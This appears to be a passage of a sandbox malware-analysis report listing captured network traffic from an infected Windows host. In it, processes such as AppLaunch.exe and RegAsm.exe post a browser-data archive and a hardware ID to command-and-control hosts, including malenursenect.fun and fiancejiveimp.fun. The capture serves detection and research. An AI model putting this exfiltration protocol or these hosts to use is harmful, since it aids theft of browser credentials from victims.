                                                                                                        Oct 3, 2023 18:02:50.635291100 CEST4672OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:50.729397058 CEST4673OUTData Raw: 70 3b 49 e3 b5 5b c7 ba ad 33 55 f7 c0 d5 84 5a 6b 19 a3 aa fa 60 54 88 65 ad 29 d1 b2 74 cb 52 44 85 e0 e4 c6 97 cc aa 1d a7 b6 53 28 3c 4a 07 3c e2 65 4c 13 42 bc 05 9e ec d9 c4 03 de 02 0f 40 02 1e 20 f1 0c c1 13 ee ec 34 89 13 67 6d 11 d3 34
                                                                                                        Data Ascii: p;I[3UZk`Te)tRDS(<J<eLB@ 4gm4H}>S+K)A"Bfs[k6xq&'{Zz"HKOx)\W,Ion[Q391}e&|oy'~*HO?xW
                                                                                                        Oct 3, 2023 18:02:50.729904890 CEST4676OUTData Raw: a4 ea b4 58 08 b6 1b 4f 6c 35 8d 67 4c 78 84 d1 ae e8 5e 07 77 a2 aa ea b9 ac fc 96 3c aa 1d c3 46 58 0c 3e 2e f8 67 25 79 45 15 db 53 c1 3a 16 4e a4 2c 98 c7 23 f9 24 cc cc 26 4d a8 d7 0d f9 05 4b 53 91 26 1d 51 84 b7 6e b4 58 df 14 8a 7a 70 fb
                                                                                                        Data Ascii: XOl5gLx^w<FX>.g%yES:N,#$&MKS&QnXzp$Kg#>nLk`pWIgu('U]m2]~?-Gv3UT'W,n6-.CW'/.s(|xze9zK
                                                                                                        Oct 3, 2023 18:02:50.729983091 CEST4679OUTData Raw: 95 c3 9d 46 f5 d0 ca 7a bf 78 df 5b 68 ac 75 e4 55 3f 39 b8 b7 72 b6 6c 07 63 b5 d5 4e f2 62 bb af 47 6d 23 93 fc da bb 74 f4 09 d9 46 26 f5 70 2b 4a b7 5e df 63 24 8d 76 bd e9 07 c6 7e e3 ee 8b 21 5f ec c2 17 d3 d6 6e f0 f7 21 b5 66 b9 cf eb 4f
                                                                                                        Data Ascii: Fzx[huU?9rlcNbGm#tF&p+J^c$v~!_n!fO2/v/8v.SDnT_yP[T}&z?562.?ZiQq[}R|@p]|d1_AuG;5SGw.Y9oo'
                                                                                                        Oct 3, 2023 18:02:50.730006933 CEST4681OUTData Raw: 62 39 b6 b0 62 99 9c 99 8e ec aa 51 60 f3 3c 77 b3 0a 12 ae 51 88 15 84 0c 57 6b b7 56 96 e7 12 9c 70 95 4b c6 e2 1b 05 4e da 5d 5e 10 0b 6c ba 59 21 56 5c 68 a0 33 c9 66 79 2e 1f 2b 6c e4 1a 14 0a d9 02 97 cf 17 73 85 58 9e 63 25 31 bb bb c6 0a
                                                                                                        Data Ascii: b9bQ`<wQWkVpKN]^lY!V\h3fy.+lsXc%1+X3mM6\r<JHpBJ6m#p+o^PUJe`1neY|yfI!%p4fqrz<*k^bUEs$le<<,N.XN
                                                                                                        Oct 3, 2023 18:02:50.730074883 CEST4684OUTData Raw: 0e bf 21 e6 71 74 05 2f 50 71 b0 51 48 91 3d 23 de d4 0c 61 4d 57 c7 6e 31 d8 58 0d 19 93 41 67 10 8f 8a 8d 1e 74 7a c5 06 32 76 4d c2 42 c5 9b 6c 36 6f 40 f0 f8 6c 1e a7 87 5e 75 ac fa 70 71 d5 df 6a 75 b0 4c e0 70 4e f6 ba a1 95 34 ee e2 90 c4
                                                                                                        Data Ascii: !qt/PqQH=#aMWn1XAgtz2vMBl6o@l^upqjuLpN4-nTf5nM\R"Mbz3tA[BoafxVW,)pl!%1UZzR7Wxxsn?uFF=74cED&1&x!/f3Nqip
                                                                                                        Oct 3, 2023 18:02:50.730205059 CEST4686OUTData Raw: e3 19 f1 d6 39 9e d3 8d 92 f6 c0 be 5f d1 49 5a 68 fb c1 ce 65 7f 46 cb 05 ff d9 09 67 40 10 af 0e f1 cd 97 98 66 bb c9 61 39 be a7 54 ea 9a 5c 31 f7 35 cb 73 38 d6 2a c0 e5 d5 eb 4b df 96 62 d5 a5 b5 d5 b6 a3 34 46 5d c7 25 9f 73 6e 55 c8 88 a3
                                                                                                        Data Ascii: 9_IZheFg@fa9T\15s8*Kb4F]%snUCvw@|@oX)>3j,VrBVIH*3#5s(k| r|&#.n;o7 -|scjlkOp/wdo"]n\_F=@0r!p_)g1j
                                                                                                        Oct 3, 2023 18:02:50.730269909 CEST4689OUTData Raw: 14 b5 6d e2 c9 1b f1 31 23 73 7e fb 61 d4 d0 9a ac 5a 9a 42 cd a8 75 1b 1d ab db ae a9 39 bf cd b6 8e 2b 6b 5a 64 ad d5 b6 74 2c e5 b5 26 02 81 80 c8 cc a1 66 d6 ea 15 1a 9e 1e 15 54 2b 12 72 b1 21 d7 cc 8a ae 36 22 74 c8 ec c6 a1 46 bb c8 0c 27
                                                                                                        Data Ascii: m1#s~aZBu9+kZdt,&fT+r!6"tF'2vg~M)A%=u*>F/Ito{Jz@,-{:E&ELnMfCVjzn](!u7:% F+8?;Htj2i2[S3N~&piIcnY
                                                                                                        Oct 3, 2023 18:02:50.730375051 CEST4692OUTData Raw: 05 b2 74 0f f7 cc f8 b1 1f b7 55 bf f2 39 cc 5b bf a8 b4 94 e7 ca f2 0c 38 16 d9 b2 af cb 6b 25 f4 8c 40 9f e5 d8 bc 6d af 51 77 ed 3c 9d de 38 bf 6d eb f5 5e 8a 5b aa fe 19 47 0e 0c 6f 3a 69 e8 e0 15 1f 72 f0 b3 a3 17 3f 64 8b 74 12 3f 2a da 8e
                                                                                                        Data Ascii: tU9[8k%@mQw<8m^[Go:ir?dt?*0 xZjND('"aQDr<x0O+Lmb)08^g9L>[d&W^ ^-3*e|/b}iDXbocr]M|O*pqHU0R
                                                                                                        Oct 3, 2023 18:02:50.730446100 CEST4694OUTData Raw: 91 29 a3 0c 4b 0b bc 19 da c8 66 06 af a5 20 79 10 f2 96 97 35 b5 12 ed ce b0 72 c0 5b f1 78 a7 18 92 ba fd f8 68 9b 20 ad 10 e3 cf 5b 0e 8d c3 d3 04 de 6a 65 28 23 80 81 ff b7 be 81 bf ee 6f 8d e7 21 8f 12 c5 78 c6 31 63 fc 7f 01 50 4b 07 08 ab
                                                                                                        Data Ascii: )Kf y5r[xh [je(#o!x1cPK2WBpPKiCW#Chrome/Default/BrowserDB/000005.ldbXS&X`%!A!&B@D]@`25@d\R\-K-lll
                                                                                                        Oct 3, 2023 18:02:51.436037064 CEST4754INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:51 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=3h951fj37tri56amdas0gpga0s; expires=Sat, 27 Jan 2024 09:49:30 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:51 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Jgqs%2FO0456t%2FCj0n8%2FXylkRy8HthpMlo%2BBFU75NkOvw%2Fi2%2F0swSC60T%2FfL83B%2B2puWpyP555CH18UABoobyIRz7PWiGdWOlwPBZA%2FoWKLKx2K2SIXl6%2BRolX8P9qQcxbVHgTvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106696aacd081a5-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:51.436049938 CEST4754INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        37192.168.2.349857172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:50.955174923 CEST4750OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:50.955653906 CEST4751OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:51.281804085 CEST4752INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:51 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=6fgifnlio9ga7c199l3tubpl6v; expires=Sat, 27 Jan 2024 09:49:30 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:51 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YnDB8TpRq3D99%2BWYSfjwFSssXQsMDc0Sh4BUiIKSJI8aByOwqRiS10fKffaoGPvPpYa%2FErfiuhK6y8kzWUEMWRReNt2XEM8kLcF4uV%2FlQA5C0UzWaRnv%2BIoCemBzknb3Y9uYOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106696cbf9059fe-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:51.281821966 CEST4752INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        38192.168.2.349858104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:51.503391981 CEST4755OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:51.503864050 CEST4755OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:51.834650040 CEST4758INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:51 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=f4pnhfgnjbp8jqcgg3e9t8m44s; expires=Sat, 27 Jan 2024 09:49:30 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:51 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K6z3FeqX%2Bf9h9aR1ZGTbh%2F7Cs5qXb8AYJDP5cUVxviutr6ZfzUdYVByvRs%2F21D7itgD5osmA2ojZnCSiIvztJ%2FLAYcWuXOCTpxi4efUOBTidtUf%2FEfW9nMcqE91btzmDfIV1MA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669701f562090-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:51.834669113 CEST4758INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        39192.168.2.349859104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:51.652271986 CEST4756OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:51.652671099 CEST4756OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:52.014172077 CEST4759INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:51 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=u7ei7d5lsm1cr4boll2i813fga; expires=Sat, 27 Jan 2024 09:49:30 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:51 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8kFk%2BOMD0dX5UkzzneyrxZx4czCdFeWQ47WweD6BX%2BtfAtGr9FQmq29ho0sBa8Yf%2Bzq7khEzexz5c4Bafj6nzzf4Iq2%2B3qS%2BvDtbOnzt5fQNs0j8HGPHy60eTGODSv9%2Fq8s8gw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066971093207c8-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:52.014189959 CEST4759INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        4192.168.2.349820211.104.254.13980C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:24.801732063 CEST310OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://fcelay.org/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 255
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:24.801765919 CEST311OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 3b 1d f9 89
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vu;v5ZB|x=53x,[v+x^<7;cI.O+Gn1a~@Qcy-9H3p7|:|su[G0
                                                                                                        Oct 3, 2023 18:02:26.086170912 CEST311INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:25 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 331
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        40192.168.2.349860104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:52.060496092 CEST4760OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:52.061012030 CEST4760OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:52.386337996 CEST4763INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:52 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=oekp9rqdbjp2cp4ujj50fcg2gh; expires=Sat, 27 Jan 2024 09:49:31 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:52 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NkEytBUsaITA%2BDN7v6p%2BfsOKRI6zBODr26U5RXe%2FNRQ44zEJ%2BEb8UKmYAbcF4mOdeWT1tT3Qp%2FUGg3LHTgkV6UBD46EC9TFnIrgMqq6Plr7AhPEGPZhpYppledWKG4S4JZhJiA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669739e120658-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:52.386370897 CEST4763INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        41192.168.2.349861172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:52.237179995 CEST4761OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:52.237593889 CEST4762OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:52.581671953 CEST4764INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:52 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=mb4crldh7m1fegn0n08lvu4mgu; expires=Sat, 27 Jan 2024 09:49:31 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:52 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ib0GDeUDZWaYW%2FcbIolPEwV%2BnPbqryxg6%2FzvGhcnx8wpBbOG5D1%2Fc4Tp8Qi2jNeQihbDVWuwkMZbyCaR%2Blt1Qt27JS8FpNWjvTIyaGG%2FcoeGVXbjfiD1oI5TLsXOJY1lOPSrhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066974be626fb6-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:52.581706047 CEST4765INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        42192.168.2.349862172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:52.592021942 CEST4765OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
